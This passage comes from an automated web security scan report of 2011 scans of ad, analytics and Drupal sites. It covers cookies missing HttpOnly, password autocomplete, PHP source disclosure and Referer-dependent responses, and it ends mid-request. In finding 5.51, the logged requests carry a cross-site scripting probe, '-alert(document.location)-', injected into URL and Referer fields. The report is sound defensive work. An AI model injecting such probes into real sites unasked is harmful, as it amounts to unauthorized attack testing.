Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6432&rnd1315831249 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3152310.js^1^1315405364^1315405364&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266432%3D1%266286%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C56%2C4%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; put_2132=439524AE8C6B634E021F5F7802166020

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:40:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266432%3D1; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C120%2C6%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
5.48. http://rs.gwallet.com/r1/pixel/x420r5075003  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r5075003

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r5075003 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Tue, 11-Sep-2012 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=o5; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Mon, 12-Sep-2016 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>
5.49. http://usadmm.dotomi.com/dmm/servlet/dmm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dmm/servlet/dmm?rurl=http%3A//ads.dotomi.com/ads.php%3Fpid%3D18300%26mtg%3D0%26ms%3D18%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D728%26rheight%3D90%26pp%3D0%26cg%3D42%26tz%3D300&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000622%2C826000622%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1552553424%3Bs=403%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=1545%3Bsc=8%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 12 Sep 2011 12:48:27 GMT
X-Name: dmm-s02
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Wed, 11-Sep-2013 12:48:27 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Sat, 10-Sep-2016 12:48:27 GMT; Path=/
Location: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=18&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=300
Content-Length: 0
Content-Type: text/plain

5.50. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s71862144072074  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s71862144072074

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s71862144072074?AQB=1&ndh=1&t=12%2F8%2F2011%2012%3A49%3A5%201%20300&pageName=%2F&g=http%3A%2F%2Fwww.mtv.co.uk%2F&r=http%3A%2F%2Fdrupal.org%2Fcases&ch=homepage&events=event16&c1=%2F&h1=index&c3=homepage&c4=not%20logged-in&c5=non-member&c16=homepage&c33=Monday&c34=5%3A30PM&c41=New&v45=Monday&v46=5%3A30PM&v49=homepage&s=1920x1200&c=16&j=1.6&v=Y&k=N&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:50:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFFD85149B5F-6000018C40017E3C|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 12:50:03 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:50:03 GMT
Last-Modified: Tue, 13 Sep 2011 12:50:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFFB-36A5-3043A8C4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www498
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
5.51. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s88215071307387  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s88215071307387

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s88215071307387?AQB=1&ndh=1&t=12%2F8%2F2011%2013%3A5%3A19%201%20300&pageName=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&g=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&r=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&ch=generic&events=event16&h1=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&c3=generic&c4=not%20logged-in&c5=non-member&c16=generic&c33=Monday&c34=7%3A00PM&c41=New&v45=Monday&v46=7%3A00PM&v49=generic&s=1920x1200&c=16&j=1.7&v=Y&k=N&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava(TM)%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:05:02 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 13:05:02 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:05:02 GMT
Last-Modified: Tue, 13 Sep 2011 13:05:02 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E037E-2269-131ACF42"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www434
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
6. Password field with autocomplete enabled  previous  next
There are 5 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

6.1. http://www.digitaldollhouse.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
</div>
<form action="/" accept-charset="UTF-8" method="post" id="newhome-register" onsubmit="pageTracker._trackPageview(&#039;/virtual/register&#039;);">
<div>
...[SNIP]...
</label>
<input type="password" name="pass[pass1]" id="edit-pass-pass1" maxlength="128" size="25" class="form-text required password-field" />
</div>
...[SNIP]...
</label>
<input type="password" name="pass[pass2]" id="edit-pass-pass2" maxlength="128" size="25" class="form-text required password-confirm" />
</div>
...[SNIP]...
6.2. http://www.digitaldollhouse.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<div id="login"><form action="/homeone?destination=homeone" accept-charset="UTF-8" method="post" id="newhome-login">
<div>
...[SNIP]...
<div class="form-item" id="newhome-login-pass-wrapper">
<input type="password" name="pass" id="newhome-login-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...
6.3. http://www.fastcompany.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<div id="left_forms"><form action="/home?destination=home" accept-charset="UTF-8" method="post" id="profilLoginForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-pass-wrapper">
<input type="password" name="pass" id="edit-pass" maxlength="60" size="20" class="form-text required" />
</div>
...[SNIP]...
6.4. http://www.fastcompany.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
</div><form action="/" accept-charset="UTF-8" method="post" id="profileSignUpForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-regPass-wrapper">
<input type="password" name="regPass" id="edit-regPass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...
6.5. http://www.nowpublic.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nowpublic.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.nowpublic.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:18 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n54.panthercdn.com
ETag: "f79c8d21f3918aedd34f5c0ed9e4fcae"
Cache-Control: max-age=360
Expires: Mon, 12 Sep 2011 12:54:12 GMT
Age: 6
Content-Length: 74898
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Mon, 12 Sep 2011 12:28:25 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="wrapper-body">
<form method="post" action="http://my.nowpublic.com/user/login">
<div id="login-name-wrapper" class="form-item">
...[SNIP]...
</label>
<input type="password" name="pass" id="login-pass" maxlength="128" size="30" class="form-text" />
</div>
...[SNIP]...
7. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<link rel="stylesheet" type="text/css" href="<?=$path?>/newhome.css" />
...[SNIP]...
8. Referer-dependent response  previous  next
There are 2 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

8.1. http://adserving.cpxinteractive.com/st  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserving.cpxinteractive.com
Path:   /st

Request 1

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
